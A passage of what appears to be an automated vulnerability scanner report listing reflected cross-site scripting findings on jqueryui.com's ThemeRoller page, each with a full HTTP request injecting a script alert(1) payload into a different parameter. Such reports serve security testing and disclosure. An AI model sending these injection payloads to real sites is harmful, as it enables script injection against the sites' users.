55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 988bb"><script>alert(1)</script>8a2c7460782 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em988bb"><script>alert(1)</script>8a2c7460782&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb9db"><script>alert(1)</script>ef4213fbf23 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normaleb9db"><script>alert(1)</script>ef4213fbf23&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120002
The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7c10"><script>alert(1)</script>093068ed04f was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545a7c10"><script>alert(1)</script>093068ed04f&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b2f4"><script>alert(1)</script>a6a969de1a8 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=2222224b2f4"><script>alert(1)</script>a6a969de1a8&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30360"><script>alert(1)</script>3dda5c6d39d was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888830360"><script>alert(1)</script>3dda5c6d39d&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9152e"><script>alert(1)</script>516645a1257 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a9152e"><script>alert(1)</script>516645a1257&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c31e6"><script>alert(1)</script>bee3a69fc06 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222c31e6"><script>alert(1)</script>bee3a69fc06&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fca1"><script>alert(1)</script>544cc932a96 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff7fca1"><script>alert(1)</script>544cc932a96&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f31c"><script>alert(1)</script>a87b30d1a5d was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=4545451f31c"><script>alert(1)</script>a87b30d1a5d&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=4545451f31c"><script>alert(1)</script>a87b30d1a5d&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa ...[SNIP]...
3.110. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jqueryui.com
Path:
/themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deade"><script>alert(1)</script>1bd88013d0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?deade"><script>alert(1)</script>1bd88013d0d=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:34:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 117121
The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6323d"><script>alert(1)</script>e503afc2b was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px6323d"><script>alert(1)</script>e503afc2b&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120061
The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7b29"><script>alert(1)</script>6aefc48648e was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8pxa7b29"><script>alert(1)</script>6aefc48648e&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d012"><script>alert(1)</script>1062076bf26 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305d012"><script>alert(1)</script>1062076bf26&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd14c"><script>alert(1)</script>f7a209fba9 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
